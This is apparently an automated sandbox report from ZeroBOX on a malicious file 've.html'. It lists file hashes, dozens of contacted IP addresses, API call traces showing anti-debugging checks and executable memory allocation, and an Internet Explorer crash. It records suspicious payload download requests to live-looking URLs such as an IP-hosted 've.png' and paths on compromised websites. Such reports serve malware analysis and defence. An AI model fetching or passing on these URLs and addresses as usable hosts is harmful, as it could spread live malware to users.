Summary | ZeroBOX

ve.html

Generic Malware Malicious Library Antivirus UPX Malicious Packer AntiDebug MSOffice File DLL OS Processor Check PE32 PE File AntiVM
Category Machine Started Completed
FILE s1_win7_x6403_us Jan. 19, 2022, 11:31 a.m. Jan. 19, 2022, 11:35 a.m.
Size 10.8KB
Type data
MD5 5c2e8fbd656903baac1dbcf81ac19e78
SHA256 483adcd805a7367b64712904038c4522fddbcba50bce3b4d5ae41b2e6ceb818f
CRC32 F4A7DA81
ssdeep 192:aYhCkQTk/twdkXVYEc9haFXQP9drp7EFy7Zea2P5YPi7zeQN4+0MCZR7T0u45uV6:aYgk/5VYEc9hax09T4CZ/2hTkjMCZRsT
Yara None matched

IP Address Status Action
103.8.26.102 Active Moloch
103.8.26.103 Active Moloch
104.168.155.129 Active Moloch
112.196.72.188 Active Moloch
117.18.232.200 Active Moloch
121.254.136.27 Active Moloch
131.100.24.231 Active Moloch
146.164.84.216 Active Moloch
148.66.159.242 Active Moloch
150.95.8.112 Active Moloch
164.124.101.2 Active Moloch
178.63.25.185 Active Moloch
178.79.147.66 Active Moloch
185.7.214.7 Active Moloch
192.254.71.210 Active Moloch
203.114.109.124 Active Moloch
207.38.84.195 Active Moloch
209.59.138.75 Active Moloch
210.3.48.214 Active Moloch
212.237.17.99 Active Moloch
217.182.143.207 Active Moloch
45.118.115.99 Active Moloch
45.142.114.231 Active Moloch
45.176.232.124 Active Moloch
46.55.222.11 Active Moloch
51.38.71.0 Active Moloch
51.68.175.8 Active Moloch
54.254.177.153 Active Moloch
58.227.42.236 Active Moloch
79.172.212.216 Active Moloch
95.111.224.35 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: IsPublic IsSerial Name BaseType
console_handle: 0x000000000000001b
1 1 0

WriteConsoleW

buffer: True False Process System.ComponentM...
console_handle: 0x0000000000000023
1 1 0

WriteConsoleW

buffer: PS C:\Users\test22\Desktop>
console_handle: 0x0000000000000017
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002c54f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306b70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306b70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306b70
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306710
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306710
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306a20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306a20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306a20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306a20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306ef0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306ef0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b306ef0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3069b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3069b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3069b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b307350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b307350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b307350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b307350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b307350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b307350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b307350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b307350
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3073c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3073c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3073c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3069b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3069b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b307510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b307510
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3069b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3069b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b3069b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002c5560
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002c5560
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002c5560
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002c5560
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b330870
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b330870
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefd7da49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefdaa73c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefdc043bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdac5295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdac2799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdb6af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdb6b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdac48d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefdd30883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefdd30ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefdd30c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefdbea4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefdbfd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefdd3347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefdd3122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefdd33542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefdbfd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefdbfd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x769e9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x769e98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefdbfd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefdd23e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefdbd0106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefdbd0182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76da652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x770fc521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefd7da49d
registers.r14: 0
registers.r15: 0
registers.rcx: 98756672
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 98762624
registers.r11: 98758432
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1925372213
registers.r13: 0
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.7.214.7/ve/ve.png
suspicious_features GET method with no useragent header suspicious_request GET http://ippur.ufrj.br/assets/W8jp7/
suspicious_features GET method with no useragent header suspicious_request GET http://sarvaero.com/assets/BRrGH0HSkc/
suspicious_features GET method with no useragent header suspicious_request GET http://atplengineering.com/wp-admin/mDk/
suspicious_features GET method with no useragent header suspicious_request GET http://www2.s12.xrea.com/-/gkUMZLMfkddmFdMlJ/
request GET http://185.7.214.7/ve/ve.png
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET http://ippur.ufrj.br/assets/W8jp7/
request GET http://sarvaero.com/assets/BRrGH0HSkc/
request GET http://atplengineering.com/wp-admin/mDk/
request GET http://www2.s12.xrea.com/-/gkUMZLMfkddmFdMlJ/
request GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
ip 103.8.26.102
ip 103.8.26.103
ip 104.168.155.129
ip 209.59.138.75
ip 51.68.175.8
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2336
region_size: 3477504
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002820000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2336
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002b70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ed000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a12000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a12000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc015000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc015000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff0d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefede1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769da000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2336
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002e30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef6e69000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2456
region_size: 2691072
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002860000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2456
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002af0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a41000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769ed000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a12000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769f4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076a12000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc015000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc015000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff0d4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefede1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769da000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769df000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769dd000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769db000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076da6000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077116000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000076da1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769e0000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000769da000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000770ef000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000770fb000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefdd17000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff074000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff071000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff076000
process_handle: 0xffffffffffffffff
1 0 0
Application Crash Process iexplore.exe with pid 2336 crashed
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefd7da49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefdaa73c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefdc043bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdac5295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdac2799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdb6af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdb6b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdac48d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefdd30883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefdd30ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefdd30c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefdbea4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefdbfd551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefdd3347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefdd3122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefdd33542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefdbfd42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefdbfd1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x769e9bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x769e98da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefdbfd0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefdd23e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefdbd0106
